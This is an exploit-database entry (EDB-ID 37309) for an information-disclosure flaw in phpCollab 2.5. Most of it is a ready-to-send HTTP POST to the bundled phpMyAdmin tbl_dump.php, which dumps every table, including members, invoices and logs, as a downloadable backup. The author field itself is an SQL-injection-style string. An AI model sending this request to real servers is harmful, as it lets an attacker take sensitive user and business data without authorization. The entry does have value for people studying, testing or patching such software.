Exploit phpCollab 2.5 - Database Backup Information Disclosure

[Exploiter]

EDB-ID

37309

Проверка EDB

1. Пройдено

Автор

TEAM ' & 1=1--

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

null

Дата публикации

2012-05-23

phpCollab 2.5 - Database Backup Information Disclosure

source: https://www.securityfocus.com/bid/53656/info

phpCollab is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.

An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks.

phpCollab 2.5 is vulnerable; other versions may also be affected. 

http://www.example.com/phpcollab/includes/phpmyadmin/tbl_dump.php
POST DATA:
table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B
%5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil
es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele
ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment
s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B
%5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase
s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r
eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select%
5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_
requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B%
5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server=
1&lang=en&db=phpcollab